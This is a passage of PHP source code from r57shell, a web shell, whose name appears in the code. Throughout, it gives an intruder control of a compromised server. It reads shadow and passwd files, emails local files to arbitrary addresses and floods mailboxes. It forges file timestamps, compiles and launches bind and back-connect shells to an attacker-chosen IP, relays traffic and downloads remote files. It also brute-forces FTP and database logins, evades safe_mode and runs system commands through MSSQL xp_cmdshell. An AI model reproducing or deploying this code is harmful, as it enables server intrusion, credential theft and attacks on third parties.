   $mssql_on = @function_exists('mssql_connect');                                  
   if($mssql_on){echo "ON";}else{echo "OFF";}
   echo "".ws(2);                                                              
   echo "PostgreSQL: ";                                                         

   $pg_on = @function_exists('pg_connect');                                        
   if($pg_on){echo "ON";}else{echo "OFF";}
   echo "".ws(2);                                                              
   echo "Oracle: ";                                                             

   $ora_on = @function_exists('ocilogon');                                         
   if($ora_on){echo "ON";}else{echo "OFF";}
   echo "
".ws(2);                                                          
                                                                                   
   echo "Safe_mode: ";                                                          

   echo (($safe_mode)?("ON"):("OFF"));
   echo "".ws(2);                                                              
   echo "Open_basedir: ";                                                       

   if($open_basedir) { if (''==($df=@ini_get('open_basedir'))) {echo "ini_get disable!";}else {echo "$df";};}
   else {echo "NONE";}                                  
   echo ws(2)."Safe_mode_exec_dir: ";                                           

   if(@function_exists('ini_get')) { if (''==($df=@ini_get('safe_mode_exec_dir'))) {echo "NONE";}else {echo "$df";};}
   else {echo "ini_get disable!";}                      
   echo ws(2)."Safe_mode_include_dir: ";                                        

   if(@function_exists('ini_get')) { if (''==($df=@ini_get('safe_mode_include_dir'))) {echo "NONE";}else {echo "$df";};}
   else {echo "ini_get disable!";}                      
   echo "
".ws(2);                                                              
   echo "Disable functions : ";$df='ini_get  disable!';                         

   if((@function_exists('ini_get')) && (''==($df=@ini_get('disable_functions')))){echo "NONE";}else{echo "$df";}
                                                                                   
   $free = @diskfreespace($dir);                                                   
   if (!$free) {$free = 0;}                                                        
   $all = @disk_total_space($dir);                                                 
   if (!$all) {$all = 0;}                                                          
   echo "
".ws(2)."Free space : ".view_size($free)." Total space: ".view_size($all)."";
                                                                                   
   $ust='';                                                                        
   if($unix && !$safe_mode){                                                       
   if (which('gcc')) {$ust.="gcc,";}                                               
   if (which('cc')) {$ust.="cc,";}                                                 
   if (which('ld')) {$ust.="ld,";}                                                 
   if (which('php')) {$ust.="php,";}                                               
   if (which('perl')) {$ust.="perl,";}                                             
   if (which('python')) {$ust.="python,";}                                         
   if (which('ruby')) {$ust.="ruby,";}                                             
   if (which('make')) {$ust.="make,";}                                             
   if (which('tar')) {$ust.="tar,";}                                               
   if (which('nc')) {$ust.="netcat,";}                                             
   if (which('locate')) {$ust.="locate,";}                                         
   if (which('suidperl')) {$ust.="suidperl,";}                                     
   }                                                                               
   if (@function_exists('pcntl_exec')) {$ust.="pcntl_exec,";}                      
   #if (which('')) {$ust.=",";}                                                    
   if($ust){echo "
".ws(2).$lang[$language.'_text137'].": ".$ust."";}
                                                                                   
   $ust='';                                                                        
   if($unix && !$safe_mode){                                                       
   if (which('kav')) {$ust.="kav,";}                                               
   if (which('nod32')) {$ust.="nod32,";}                                           
   if (which('bdcored')) {$ust.="bitdefender,";}                                   
   if (which('uvscan')) {$ust.="mcafee,";}                                         
   if (which('sav')) {$ust.="symantec,";}                                          
   #if (which('')) {$ust.=",";}                                                    
   if (which('drwebd')) {$ust="drwebd,";}                                          
   if (which('clamd')) {$ust.="clamd,";}                                           
   if (which('rkhunter')) {$ust.="rkhunter,";}                                     
   if (which('chkrootkit')) {$ust.="chkrootkit,";}                                 
   if (which('iptables')) {$ust.="iptables,";}                                     
   if (which('ipfw')) {$ust.="ipfw,";}                                             
   if (which('tripwire')) {$ust.="tripwire,";}                                     
   if (which('shieldcc')) {$ust.="stackshield,";}                                  
   if (which('portsentry')) {$ust.="portsentry,";}                                 
   if (which('snort')) {$ust.="snort,";}                                           
   if (which('ossec')) {$ust.="ossec,";}                                           
   if (which('lidsadm')) {$ust.="lidsadm,";}                                       
   if (which('tcplodg')) {$ust.="tcplodg,";}                                       
   if (which('tripwire')) {$ust.="tripwire,";}                                     
   if (which('sxid')) {$ust.="sxid,";}                                             
   if (which('logcheck')) {$ust.="logcheck,";}                                     
   if (which('logwatch')) {$ust.="logwatch,";}                                     
   #if (which('')) {$ust.=",";}                                                    
   }                                                                               
   if (@function_exists('apache_get_modules') && @in_array('mod_security',apache_get_modules())) {$ust.="mod_security,";}
   if($ust){echo "
".ws(2).$lang[$language.'_text138'].": $ust";}
                                                                                   
                                                                                   
   echo "
".ws(2)."";                                                       
   echo ws(2).$lb." phpinfo ".$rb;
   echo ws(2).$lb." php.ini ".$rb;
   echo ws(2).$lb." cpu ".$rb;
   echo ws(2).$lb." mem ".$rb;
   if(!$unix) {                                                                    
    echo ws(2).$lb." systeminfo ".$rb;
   }else{                                                                          
    echo ws(2).$lb." syslog ".$rb;
    echo ws(2).$lb." resolv ".$rb;
    echo ws(2).$lb." hosts ".$rb;
    echo ws(2).$lb." shadow ".$rb;
    echo ws(2).$lb." passwd ".$rb; 
   }                                                                               
   echo ws(2).$lb." tmp ".$rb;
   echo ws(2).$lb." delete ".$rb;
                                                                                   
   if($unix && !$safe_mode)                                                        
   {                                                                               
    echo "
".ws(2)."";                                                      
    echo ws(2).$lb." procinfo ".$rb;
    echo ws(2).$lb." version ".$rb;
    echo ws(2).$lb." free ".$rb;
    echo ws(2).$lb." dmesg ".$rb;
    echo ws(2).$lb." vmstat ".$rb;
    echo ws(2).$lb." lspci ".$rb;
    echo ws(2).$lb." lsdev ".$rb;
    echo ws(2).$lb." interrupts ".$rb;
    echo ws(2).$lb." realise1 ".$rb;
    echo ws(2).$lb." realise2 ".$rb;
    echo ws(2).$lb." lsattr ".$rb;
                                                                                   
    echo "
".ws(2)."";                                                      
    echo ws(2).$lb." w ".$rb;
    echo ws(2).$lb." who ".$rb;
    echo ws(2).$lb." uptime ".$rb;
    echo ws(2).$lb." last ".$rb;
    echo ws(2).$lb." ps aux ".$rb;
    echo ws(2).$lb." service ".$rb;
    echo ws(2).$lb." ifconfig ".$rb;
    echo ws(2).$lb." netstat ".$rb;
    echo ws(2).$lb." fstab ".$rb;
    echo ws(2).$lb." fdisk ".$rb;
    echo ws(2).$lb." df -h ".$rb;
   }                                                                               
                                                                                   
   echo '
   
                                                  
   
                  
';                                                
   echo $font;                                                                     
                                                                                   
   if($unix){                                                                      
   echo 'uname -a :'.ws(1).'
sysctl :'.ws(1).'
$OSTYPE :'.ws(1).'
Server :'.ws(1).'
id :'.ws(1).'
pwd :'.ws(1).'
';
   echo " ";                                                               
   echo "";                                

   echo((!empty($uname))?(ws(3).@substr($uname,0,120)."
"):(ws(3).@substr(@php_uname(),0,120)."
"));
   echo ws(3).$sysctl."
";                                                      
   echo ws(3).ex('echo $OSTYPE')."
";                                           
   echo ws(3).@substr($SERVER_SOFTWARE,0,120)."
";                              
   if(!empty($id)) { echo ws(3).$id."
"; }                                      
   else if(@function_exists('posix_geteuid') && @function_exists('posix_getegid') && @function_exists('posix_getgrgid') && @function_exists('posix_getpwuid'))
    {                                                                              
    $euserinfo  = @posix_getpwuid(@posix_geteuid());                               
    $egroupinfo = @posix_getgrgid(@posix_getegid());                               
    echo ws(3).'uid='.$euserinfo['uid'].' ( '.$euserinfo['name'].' ) gid='.$egroupinfo['gid'].' ( '.$egroupinfo['name'].' )
';
    }                                                                              
   else echo ws(3)."user=".@get_current_user()." uid=".@getmyuid()." gid=".@getmygid()."
";
   echo ws(3).$dir;                                                                
   echo ws(3).'( '.perms(@fileperms($dir)).' )';                                   
   echo "";                                                             
   }                                                                               
   else                                                                            
   {                                                                               
   echo 'OS :'.ws(1).'
Server :'.ws(1).'
User :'.ws(1).'
pwd :'.ws(1).'
';
   echo " ";                                                               
   echo "";                                

   echo ws(3).@substr(@php_uname(),0,120)."
";                                  
   echo ws(3).@substr($SERVER_SOFTWARE,0,120)."
";                              
   echo ws(3).@getenv("USERNAME")."
";                                          
   echo ws(3).$dir;                                                                
   echo "
";                                                             
   }                                                                               
   echo "";                                                                 
   echo "
";                                                      
                                                                                   
   if(!empty($_POST['cmd']) && $_POST['cmd']=="mail")                              
    {                                                                              
    $res = mail($_POST['to'],$_POST['subj'],$_POST['text'],"From: ".$_POST['from']."\r\n");
    err(6+$res);                                                                   
    $_POST['cmd']="";                                                              
    }                                                                              
   if(!empty($_POST['cmd']) && $_POST['cmd']=="mail_file" && !empty($_POST['loc_file']))
    {                                                                              
     if($file=@fopen($_POST['loc_file'],"r")){ $filedump = @fread($file,@filesize($_POST['loc_file'])); @fclose($file); }
     else if ($file=readzlib($_POST['loc_file'])) { $filedump = $file; } else { err(1,$_POST['loc_file']); $_POST['cmd']=""; }
     if(isset($_POST['cmd']))                                                      
     {                                                                             
       $filename = @basename($_POST['loc_file']);                                  
       $content_encoding=$mime_type='';                                            
       compress($filename,$filedump,$_POST['compress']);                           
       $attach = array(                                                            
                       "name"=>$filename,                                          
                       "type"=>$mime_type,                                         
                       "content"=>$filedump                                        
                      );                                                           
       if(empty($_POST['subj'])) { $_POST['subj'] = 'file from r57shell'; }        
       if(empty($_POST['from'])) { $_POST['from'] = 'vito.eshop@gmail.com'; }      
       $res = mailattach($_POST['to'],$_POST['from'],$_POST['subj'],$attach);      
       err(6+$res);                                                                
       $_POST['cmd']="";                                                           
     }                                                                             
    }                                                                              
   if(!empty($_POST['cmd']) && $_POST['cmd']=="mail_bomber" && !empty($_POST['mail_flood']) && !empty($_POST['mail_size']))
    {                                                                              
    for($h=1;$h<=$_POST['mail_flood'];$h++){                                       
     $res = mail($_POST['to'],$_POST['subj'],$_POST['text'].str_repeat(" ", 1024*$_POST['mail_size']),"From: ".$_POST['from']."\r\n");
    }                                                                              
    err(6+$res);                                                                   
    $_POST['cmd']="";                                                              
    }                                                                              
   if(!empty($_POST['cmd']) && $_POST['cmd'] == "find_text")                       
   {                                                                               
   $_POST['cmd'] = 'find '.$_POST['s_dir'].' -name \''.$_POST['s_mask'].'\' | xargs grep -E \''.$_POST['s_text'].'\'';
   }                                                                               
   if(!empty($_POST['cmd']) && $_POST['cmd']=="ch_")                               
    {                                                                              
    switch($_POST['what'])                                                         
      {                                                                            
      case 'own':                                                                  
      @chown($_POST['param1'],$_POST['param2']);                                   
      break;                                                                       
      case 'grp':                                                                  
      @chgrp($_POST['param1'],$_POST['param2']);                                   
      break;                                                                       
      case 'mod':                                                                  
      @chmod($_POST['param1'],intval($_POST['param2'], 8));                        
      break;                                                                       
      }                                                                            
    $_POST['cmd']="";                                                              
    }                                                                              
   if(!empty($_POST['cmd']) && $_POST['cmd']=="mk")                                
    {                                                                              
      switch($_POST['what'])                                                       
      {                                                                            
        case 'file':                                                               
         if($_POST['action'] == "create")                                          
          {                                                                        
          if(@file_exists($_POST['mk_name']) || !$file=@fopen($_POST['mk_name'],"w")) { err(2,$_POST['mk_name']); $_POST['cmd']=""; }
          else {                                                                   
           @fclose($file);                                                         
           $_POST['e_name'] = $_POST['mk_name'];                                   
           $_POST['cmd']="edit_file";                                              
           echo "".$lang[$language.'_text61']."
";
           }                                                                       
          }                                                                        
          else if($_POST['action'] == "delete")                                    
          {                                                                        
          if(unlink($_POST['mk_name'])) echo "".$lang[$language.'_text63']."
";
          $_POST['cmd']="";                                                        
          }                                                                        
        break;                                                                     
        case 'dir':                                                                
         if($_POST['action'] == "create"){                                         
         if(@mkdir($_POST['mk_name']))                                             
          {                                                                        
            $_POST['cmd']="";                                                      
            echo "".$lang[$language.'_text62']."
";
          }                                                                        
         else { err(2,$_POST['mk_name']); $_POST['cmd']=""; }                      
         }                                                                         
         else if($_POST['action'] == "delete"){                                    
         if(@rmdir($_POST['mk_name'])) echo "".$lang[$language.'_text64']."
";
         $_POST['cmd']="";                                                         
         }                                                                         
        break;                                                                     
      }                                                                            
    }                                                                              
                                                                                   
                                                                                   
   if(!empty($_POST['cmd']) && $_POST['cmd']=="touch")                             
   {                                                                               
   if(!$_POST['file_name_r'])                                                      
    {                                                                              
     $datar = $_POST['day']." ".$_POST['month']." ".$_POST['year']." ".$_POST['chasi']." hours ".$_POST['minutes']." minutes ".$_POST['second']." seconds";
     $datar = @strtotime($datar);                                                  
     @touch($_POST['file_name'],$datar,$datar);}                                   
   else{                                                                           
     @touch($_POST['file_name'],@filemtime($_POST['file_name_r']),@filemtime($_POST['file_name_r']));
   }                                                                               
   $_POST['cmd']="";                                                               
   }                                                                               
                                                                                   
                                                                                   
   if(!empty($_POST['cmd']) && $_POST['cmd']=="edit_file" && !empty($_POST['e_name']))
    {                                                                              
    if(!$file=@fopen($_POST['e_name'],"r+")) { $filedump = @fread($file,@filesize($_POST['e_name'])); @fclose($file); $only_read = 1; }
    if($file=@fopen($_POST['e_name'],"r")) { $filedump = @fread($file,@filesize($_POST['e_name'])); @fclose($file); }
    else if ($file=readzlib($_POST['e_name'])) { $filedump = $file; $only_read = 1; } else { err(1,$_POST['e_name']); $_POST['cmd']=""; }
    if(isset($_POST['cmd']))                                                       
    {                                                                              
    echo $table_up3;                                                               
    echo $font;                                                                    
    echo "";                                      
    echo ws(3)."".$_POST['e_name']."";                                      
    echo "";              </PRE>
<PRE>    echo @htmlspecialchars($filedump);                                             </PRE>
<PRE>    echo "";                                                            
    echo "";             
    echo "";                            
    echo "";                           
    echo (!empty($only_read)?("

".$lang[$language.'_text44']):("

"));
    echo "";                                                                 
    echo "";                                                                
    echo "";                                                                
    echo "";                                                     
    exit();                                                                        
    }                                                                              
    }                                                                              
   if(!empty($_POST['cmd']) && $_POST['cmd']=="save_file")                         
    {                                                                              
    $mtime = @filemtime($_POST['e_name']);                                         
    if((!$file=@fopen($_POST['e_name'],"w")) && (!function_exists('file_put_contents'))) { err(0,$_POST['e_name']); }
    else {                                                                         
    if($unix) $_POST['e_text']=@str_replace("\r\n","\n",$_POST['e_text']);         
    @fwrite($file,$_POST['e_text']) or @fputs($file,$_POST['e_text']) or @file_put_contents($_POST['e_name'],$_POST['e_text']);
    @touch($_POST['e_name'],$mtime,$mtime);                                        
    $_POST['cmd']="";                                                              
    echo "".$lang[$language.'_text45']."
";
    }                                                                              
    }                                                                              
                                                                                   
                                                                                   
   if (!empty($_POST['proxy_port'])&&($_POST['use']=="Perl"))                      
   {                                                                               
    cf("/tmp/prxpl",$prx_pl);                                                      
    $p2=which("perl");                                                             
    $blah = ex($p2." /tmp/prxpl ".$_POST['proxy_port']." &");                      
    $_POST['cmd']="ps -aux | grep prxpl";                                          
   }                                                                               
   if (!empty($_POST['port'])&&!empty($_POST['bind_pass'])&&($_POST['use']=="C"))  
   {                                                                               
    cf("/tmp/bd.c",$port_bind_bd_c);                                               
    $blah = ex("gcc -o /tmp/bd /tmp/bd.c");                                        
    @unlink("/tmp/bd.c");                                                          
    $blah = ex("/tmp/bd ".$_POST['port']." ".$_POST['bind_pass']." &");            
    $_POST['cmd']="ps -aux | grep bd";                                             
   }                                                                               
   if (!empty($_POST['port'])&&!empty($_POST['bind_pass'])&&($_POST['use']=="Perl"))
   {                                                                               
    cf("/tmp/bdpl",$port_bind_bd_pl);                                              
    $p2=which("perl");                                                             
    $blah = ex($p2." /tmp/bdpl ".$_POST['port']." &");                             
    $_POST['cmd']="ps -aux | grep bdpl";                                           
   }                                                                               
   if (!empty($_POST['ip']) && !empty($_POST['port']) && ($_POST['use']=="Perl"))  
   {                                                                               
    cf("/tmp/back",$back_connect);                                                 
    $p2=which("perl");                                                             
    $blah = ex($p2." /tmp/back ".$_POST['ip']." ".$_POST['port']." &");            
    $_POST['cmd']="echo \"Now script try connect to ".$_POST['ip']." port ".$_POST['port']." ...\"";
   }                                                                               
   if (!empty($_POST['ip']) && !empty($_POST['port']) && ($_POST['use']=="C"))     
   {                                                                               
    cf("/tmp/back.c",$back_connect_c);                                             
    $blah = ex("gcc -o /tmp/backc /tmp/back.c");                                   
    @unlink("/tmp/back.c");                                                        
    $blah = ex("/tmp/backc ".$_POST['ip']." ".$_POST['port']." &");                
    $_POST['cmd']="echo \"Now script try connect to ".$_POST['ip']." port ".$_POST['port']." ...\"";
   }                                                                               
   if (!empty($_POST['local_port']) && !empty($_POST['remote_host']) && !empty($_POST['remote_port']) && ($_POST['use']=="Perl"))
   {                                                                               
    cf("/tmp/dp",$datapipe_pl);                                                    
    $p2=which("perl");                                                             
    $blah = ex($p2." /tmp/dp ".$_POST['local_port']." ".$_POST['remote_host']." ".$_POST['remote_port']." &");
    $_POST['cmd']="ps -aux | grep dp";                                             
   }                                                                               
   if (!empty($_POST['local_port']) && !empty($_POST['remote_host']) && !empty($_POST['remote_port']) && ($_POST['use']=="C"))
   {                                                                               
    cf("/tmp/dpc.c",$datapipe_c);                                                  
    $blah = ex("gcc -o /tmp/dpc /tmp/dpc.c");                                      
    @unlink("/tmp/dpc.c");                                                         
    $blah = ex("/tmp/dpc ".$_POST['local_port']." ".$_POST['remote_port']." ".$_POST['remote_host']." &");
    $_POST['cmd']="ps -aux | grep dpc";                                            
   }                                                                               
                                                                                   
   if (!empty($_POST['alias']) && isset($aliases[$_POST['alias']])) { $_POST['cmd'] = $aliases[$_POST['alias']]; }
                                                                                   
   for($upl=0;$upl<=16;$upl++)                                                     
   {                                                                               
    if(!empty($HTTP_POST_FILES['userfile'.$upl]['name'])){                         
     if(!empty($_POST['new_name']) && ($upl==0)) { $nfn = $_POST['new_name']; }    
     else { $nfn = $HTTP_POST_FILES['userfile'.$upl]['name']; }                    
     @move_uploaded_file($HTTP_POST_FILES['userfile'.$upl]['tmp_name'],$_POST['dir']."/".$nfn)
     or print("Error uploading file ".$HTTP_POST_FILES['userfile'.$upl]['name']."");
    }                                                                              
   }                                                                               
                                                                                   
   if (!empty($_POST['with']) && !empty($_POST['rem_file']) && !empty($_POST['loc_file']))
   {                                                                               
    switch($_POST['with'])                                                         
    {                                                                              
    case 'fopen':                                                                  
    $datafile = @implode("", @file($_POST['rem_file']));                           
    if($datafile)                                                                  
     {                                                                             
      $w_file=@fopen($_POST['loc_file'],"wb") or @function_exists('file_put_contents') or err(0);
      if($w_file)                                                                  
      {                                                                            
       @fwrite($w_file,$datafile) or @fputs($w_file,$datafile) or @file_put_contents($_POST['loc_file'],$datafile);
       @fclose($w_file);                                                           
      }                                                                            
     }                                                                             
    $_POST['cmd'] = '';                                                            
    break;                                                                         
    case 'wget':                                                                   
    $_POST['cmd'] = which('wget')." ".$_POST['rem_file']." -O ".$_POST['loc_file']."";
    break;                                                                         
    case 'fetch':                                                                  
    $_POST['cmd'] = which('fetch')." -o ".$_POST['loc_file']." -p ".$_POST['rem_file']."";
    break;                                                                         
    case 'lynx':                                                                   
    $_POST['cmd'] = which('lynx')." -source ".$_POST['rem_file']." > ".$_POST['loc_file']."";
    break;                                                                         
    case 'links':                                                                  
    $_POST['cmd'] = which('links')." -source ".$_POST['rem_file']." > ".$_POST['loc_file']."";
    break;                                                                         
    case 'GET':                                                                    
    $_POST['cmd'] = which('GET')." ".$_POST['rem_file']." > ".$_POST['loc_file']."";
    break;                                                                         
    case 'curl':                                                                   
    $_POST['cmd'] = which('curl')." ".$_POST['rem_file']." -o ".$_POST['loc_file']."";
    break;                                                                         
    }                                                                              
   }                                                                               
   if(!empty($_POST['cmd']) && (($_POST['cmd']=="ftp_file_up") || ($_POST['cmd']=="ftp_file_down")))
    {                                                                              
    list($ftp_server,$ftp_port) = split(":",$_POST['ftp_server_port']);            
    if(empty($ftp_port)) { $ftp_port = 21; }                                       
    $connection = @ftp_connect ($ftp_server,$ftp_port,10);                         
    if(!$connection) { err(3); }                                                   
    else                                                                           
     {                                                                             
     if(!@ftp_login($connection,$_POST['ftp_login'],$_POST['ftp_password'])) { err(4); }
     else                                                                          
      {                                                                            
      if($_POST['cmd']=="ftp_file_down") { if(chop($_POST['loc_file'])==$dir) { $_POST['loc_file']=$dir.((!$unix)?('\\'):('/')).basename($_POST['ftp_file']); } @ftp_get($connection,$_POST['loc_file'],$_POST['ftp_file'],$_POST['mode']);}
      if($_POST['cmd']=="ftp_file_up")   { @ftp_put($connection,$_POST['ftp_file'],$_POST['loc_file'],$_POST['mode']);}
      }                                                                            
     }                                                                             
    @ftp_close($connection);                                                       
    $_POST['cmd'] = "";                                                            
    }                                                                              
                                                                                   
   if(!empty($_POST['cmd']) && (($_POST['cmd']=="ftp_brute") || ($_POST['cmd']=="db_brute")))
    {                                                                              
    if($_POST['cmd']=="ftp_brute"){                                                
     list($ftp_server,$ftp_port) = split(":",$_POST['ftp_server_port']);           
     if(empty($ftp_port)) { $ftp_port = 21; }                                      
     $connection = @ftp_connect ($ftp_server,$ftp_port,10);                        
    }else if($_POST['cmd']=="db_brute"){                                           
      $connection = 1;                                                             
    }                                                                              
    if(!$connection) { err(3); $_POST['cmd'] = ""; }                               
    else if(($_POST['brute_method']=='passwd') && (!$users=get_users('/etc/passwd'))){ echo "".$lang[$language.'_text96']."
"; $_POST['cmd'] = ""; }
    else if(($_POST['brute_method']=='dic') && (!$users=get_users($_POST['dictionary']))){ echo "Can\'t get password list
"; $_POST['cmd'] = ""; }
    if($_POST['cmd']=="ftp_brute"){@ftp_close($connection);}                       
    }                                                                              
                                                                                   
   echo $table_up3;                                                                
   if (empty($_POST['cmd']) && !$safe_mode && !$open_basedir) { $_POST['cmd']=(!$unix)?("dir"):("ls -lia"); }
   else if(empty($_POST['cmd']) && ($safe_mode || $open_basedir)){ $_POST['cmd']="safe_dir"; }
   echo $font.$lang[$language.'_text1'].": ".$_POST['cmd']."";</PRE>
<PRE>   if($safe_mode || $open_basedir)                                                 </PRE>
<PRE>   {                                                                               </PRE>
<PRE>    switch($_POST['cmd'])                                                          </PRE>
<PRE>    {                                                                              </PRE>
<PRE>    case 'safe_dir':                                                               </PRE>
<PRE>     $d=@dir($dir);                                                                </PRE>
<PRE>     if ($d)                                                                       </PRE>
<PRE>      {                                                                            </PRE>
<PRE>      while (false!==($file=$d->read()))                                           </PRE>
<PRE>       {                                                                           </PRE>
<PRE>        if ($file=="." || $file=="..") continue;                                   </PRE>
<PRE>        @clearstatcache();                                                         </PRE>
<PRE>        @list ($dev, $inode, $inodep, $nlink, $uid, $gid, $inodev, $size, $atime, $mtime, $ctime, $bsize) = stat($file);</PRE>
<PRE>        if(!$unix){                                                                </PRE>
<PRE>        echo date("d.m.Y H:i",$mtime);                                             </PRE>
<PRE>        if(@is_dir($file)) echo "  <DIR> "; else printf("% 7s ",$size);            </PRE>
<PRE>        }                                                                          </PRE>
<PRE>        else{                                                                      </PRE>
<PRE>        if(@function_exists('posix_getpwuid')){                                    </PRE>
<PRE>         $owner = @posix_getpwuid($uid);                                           </PRE>
<PRE>         $grgid = @posix_getgrgid($gid);                                           </PRE>
<PRE>        }else{$owner['name']=$grgid['name']='';}                                   </PRE>
<PRE>        echo $inode." ";                                                           </PRE>
<PRE>        echo perms(@fileperms($file));                                             </PRE>
<PRE>        @printf("% 4d % 9s % 9s %7s ",$nlink,$owner['name'],$grgid['name'],$size); </PRE>
<PRE>        echo date("d.m.Y H:i ",$mtime);                                            </PRE>
<PRE>        }                                                                          </PRE>
<PRE>        echo "$file\n";                                                            </PRE>
<PRE>       }                                                                           </PRE>
<PRE>      $d->close();                                                                 </PRE>
<PRE>      }                                                                            </PRE>
<PRE>     else if(@function_exists('glob'))                                             </PRE>
<PRE>      {                                                                            </PRE>
<PRE>          function eh($errno, $errstr, $errfile, $errline)                         </PRE>
<PRE>           {                                                                       </PRE>
<PRE>             global $D, $c, $i;                                                    </PRE>
<PRE>             preg_match("/SAFE\ MODE\ Restriction\ in\ effect\..*whose\ uid\ is(.*)is\ not\ allowed\ to\ access(.*)owned by uid(.*)/", $errstr, $o); </PRE>
<PRE>             if($o){ $D[$c] = $o[2]; $c++;}                                        </PRE>
<PRE>           }                                                                       </PRE>
<PRE>          $error_reporting = @ini_get('error_reporting');                          </PRE>
<PRE>          error_reporting(E_WARNING);                                              </PRE>
<PRE>          @ini_set("display_errors", 1);                                           </PRE>
<PRE>          $root = "/";                                                             </PRE>
<PRE>          if($dir) $root = $dir;                                                   </PRE>
<PRE>          $c = 0; $D = array();                                                    </PRE>
<PRE>          @set_error_handler("eh");                                                </PRE>
<PRE>          $chars = "_-.01234567890abcdefghijklnmopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ"; </PRE>
<PRE>          for($i=0; $i < strlen($chars); $i++)                                     </PRE>
<PRE>          {                                                                        </PRE>
<PRE>           $path ="{$root}".((substr($root,-1)!="/") ? "/" : NULL)."{$chars[$i]}"; </PRE>
<PRE>           $prevD = $D[count($D)-1];                                               </PRE>
<PRE>           @glob($path."*");                                                       </PRE>
<PRE>           if($D[count($D)-1] != $prevD)                                           </PRE>
<PRE>            {                                                                      </PRE>
<PRE>              for($j=0; $j < strlen($chars); $j++)                                 </PRE>
<PRE>              {                                                                    </PRE>
<PRE>               $path ="{$root}".((substr($root,-1)!="/") ? "/" : NULL)."{$chars[$i]}{$chars[$j]}"; </PRE>
<PRE>               $prevD2 = $D[count($D)-1];                                          </PRE>
<PRE>               @glob($path."*");                                                   </PRE>
<PRE>               if($D[count($D)-1] != $prevD2)                                      </PRE>
<PRE>                {                                                                  </PRE>
<PRE>                 for($p=0; $p < strlen($chars); $p++)                              </PRE>
<PRE>                  {                                                                </PRE>
<PRE>                   $path ="{$root}".((substr($root,-1)!="/") ? "/" : NULL)."{$chars[$i]}{$chars[$j]}{$chars[$p]}"; </PRE>
<PRE>                   $prevD3 = $D[count($D)-1];                                      </PRE>
<PRE>                   @glob($path."*");                                               </PRE>
<PRE>                   if($D[count($D)-1] != $prevD3)                                  </PRE>
<PRE>                    {                                                              </PRE>
<PRE>                     for($r=0; $r < strlen($chars); $r++)                          </PRE>
<PRE>                      {                                                            </PRE>
<PRE>                       $path ="{$root}".((substr($root,-1)!="/") ? "/" : NULL)."{$chars[$i]}{$chars[$j]}{$chars[$p]}{$chars[$r]}"; </PRE>
<PRE>                       @glob($path."*");                                           </PRE>
<PRE>                      }                                                            </PRE>
<PRE>                    }                                                              </PRE>
<PRE>                  }                                                                </PRE>
<PRE>                }                                                                  </PRE>
<PRE>              }                                                                    </PRE>
<PRE>            }                                                                      </PRE>
<PRE>          }                                                                        </PRE>
<PRE>          $D = array_unique($D);                                                   </PRE>
<PRE>          foreach($D as $item) echo htmlspecialchars("{$item}")."\r\n";            </PRE>
<PRE>          error_reporting($error_reporting);                                       </PRE>
<PRE>      }                                                                            </PRE>
<PRE>     else echo $lang[$language.'_text29'];                                         </PRE>
<PRE>    break;                                                                         </PRE>
<PRE>     case 'test1':                                                                 </PRE>
<PRE>     $ci = @curl_init("file://".$_POST['test1_file']);                             </PRE>
<PRE>     $cf = @curl_exec($ci);                                                        </PRE>
<PRE>     echo htmlspecialchars($cf);                                                   </PRE>
<PRE>     break;                                                                        </PRE>
<PRE>     case 'test2':                                                                 </PRE>
<PRE>     @include($_POST['test2_file']);                                               </PRE>
<PRE>     break;                                                                        </PRE>
<PRE>     case 'test3':                                                                 </PRE>
<PRE>     if(empty($_POST['test3_port'])) { $_POST['test3_port'] = "3306"; }            </PRE>
<PRE>     $db = @mysql_connect('localhost:'.$_POST['test3_port'],$_POST['test3_ml'],$_POST['test3_mp']);</PRE>
<PRE>     if($db)                                                                       </PRE>
<PRE>      {                                                                            </PRE>
<PRE>      if(@mysql_select_db($_POST['test3_md'],$db))                                 </PRE>
<PRE>       {                                                                           </PRE>
<PRE>        @mysql_query("DROP TABLE IF EXISTS temp_r57_table");                       </PRE>
<PRE>        @mysql_query("CREATE TABLE `temp_r57_table` ( `file` LONGBLOB NOT NULL )");</PRE>
<PRE>        @mysql_query("LOAD DATA INFILE \"".$_POST['test3_file']."\" INTO TABLE temp_r57_table");</PRE>
<PRE>        $r = @mysql_query("SELECT * FROM temp_r57_table");                         </PRE>
<PRE>        while(($r_sql = @mysql_fetch_array($r))) { echo @htmlspecialchars($r_sql[0])."\r\n"; }</PRE>
<PRE>        @mysql_query("DROP TABLE IF EXISTS temp_r57_table");                       </PRE>
<PRE>       }                                                                           </PRE>
<PRE>       else echo "[-] ERROR! Can't select database";                               </PRE>
<PRE>      @mysql_close($db);                                                           </PRE>
<PRE>      }                                                                            </PRE>
<PRE>     else echo "[-] ERROR! Can't connect to mysql server";                         </PRE>
<PRE>     break;                                                                        </PRE>
<PRE>     case 'test4':                                                                 </PRE>
<PRE>     if(empty($_POST['test4_port'])) { $_POST['test4_port'] = "1433"; }            </PRE>
<PRE>     $db = @mssql_connect('localhost,'.$_POST['test4_port'],$_POST['test4_ml'],$_POST['test4_mp']);</PRE>
<PRE>     if($db)                                                                       </PRE>
<PRE>      {                                                                            </PRE>
<PRE>      if(@mssql_select_db($_POST['test4_md'],$db))                                 </PRE>
<PRE>       {                                                                           </PRE>
<PRE>        @mssql_query("drop table r57_temp_table",$db);                             </PRE>
<PRE>        @mssql_query("create table r57_temp_table ( string VARCHAR (500) NULL)",$db);</PRE>
<PRE>        @mssql_query("insert into r57_temp_table EXEC master.dbo.xp_cmdshell '".$_POST['test4_file']."'",$db);</PRE>
<PRE>        $res = mssql_query("select * from r57_temp_table",$db);                    </PRE>
<PRE>        while(($row=@mssql_fetch_row($res)))                                       </PRE>
<PRE>         {                                                                         </PRE>
<PRE>         echo htmlspecialchars($row[0])."\r\n";                                    </PRE>
<PRE>         }                                                                         </PRE>
<PRE>       @mssql_query("drop table r57_temp_table",$db);                              </PRE>
<PRE>       }                                                                           </PRE>
<PRE>       else echo "[-] ERROR! Can't select database";                               </PRE>
<PRE>      @mssql_close($db);                                                           </PRE>
<PRE>      }                                                                            </PRE>
<PRE>     else echo "[-] ERROR! Can't connect to MSSQL server";                         </PRE>
<PRE>     break;                                                                        </PRE>
<PRE>     case 'test5':                                                                 </PRE>
<PRE>     $temp=tempnam($dir, "fname");                                                 </PRE>
<PRE>     if (@file_exists($temp)) @unlink($temp);                                      </PRE>
<PRE>     $extra = "-C ".$_POST['test5_file']." -X $temp";                              </PRE>
<PRE>     @mb_send_mail(NULL, NULL, NULL, NULL, $extra);                                </PRE>
<PRE>     $str = moreread($temp);                                                       </PRE>
<PRE>     echo htmlspecialchars($str);                                                  </PRE>
